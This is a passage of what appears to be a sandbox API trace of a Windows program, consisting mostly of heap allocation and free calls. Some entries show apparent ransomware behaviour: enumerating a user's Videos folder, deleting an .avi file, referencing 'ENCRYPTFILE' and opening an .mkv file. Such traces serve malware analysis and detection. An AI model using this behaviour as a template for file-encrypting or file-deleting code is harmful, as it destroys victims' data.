cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.482] FreeLibrary (hLibModule=0x756e0000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0099.482] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0099.482] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0099.482] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0099.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0099.483] CloseHandle (hObject=0x298) returned 1 [0099.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0099.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0099.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0099.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0099.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0099.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.483] CloseHandle (hObject=0x258) returned 1 [0099.541] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi", lpFilePart=0x0) returned 0x2f [0099.541] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\nlad7.avi")) returned 0x20 [0099.541] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe64f3ab0, ftCreationTime.dwHighDateTime=0x1d5e4a0, ftLastAccessTime.dwLowDateTime=0x82f1e440, ftLastAccessTime.dwHighDateTime=0x1d5eb1c, ftLastWriteTime.dwLowDateTime=0x82f1e440, ftLastWriteTime.dwHighDateTime=0x1d5eb1c, nFileSizeHigh=0x0, nFileSizeLow=0x16f6b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="NLad7.avi", cAlternateFileName="")) returned 0x41ac2c0 [0099.542] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\nlad7.avi")) returned 1 [0099.625] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe64f3ab0, ftCreationTime.dwHighDateTime=0x1d5e4a0, ftLastAccessTime.dwLowDateTime=0x82f1e440, ftLastAccessTime.dwHighDateTime=0x1d5eb1c, ftLastWriteTime.dwLowDateTime=0x82f1e440, ftLastWriteTime.dwHighDateTime=0x1d5eb1c, nFileSizeHigh=0x0, nFileSizeLow=0x16f6b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="NLad7.avi", cAlternateFileName="")) returned 0 [0099.625] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0099.626] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0099.626] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6aad530, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0x75221700, ftLastAccessTime.dwHighDateTime=0x1d5e90e, ftLastWriteTime.dwLowDateTime=0x75221700, ftLastWriteTime.dwHighDateTime=0x1d5e90e, nFileSizeHigh=0x0, nFileSizeLow=0xde93, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="oxSznFWHwYcj-6Y.mkv", cAlternateFileName="OXSZNF~1.MKV")) returned 0x41ac040 [0099.626] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0099.626] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0099.627] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0099.627] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0099.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0099.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0099.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0099.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0099.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0099.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0099.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0099.629] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\oxsznfwhwycj-6y.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0099.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0099.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0099.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0099.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0099.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0099.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0099.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0099.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0099.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.632] FreeLibrary (hLibModule=0x772d0000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0099.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.636] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.636] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0099.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0099.636] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0099.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0099.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0099.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0099.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | 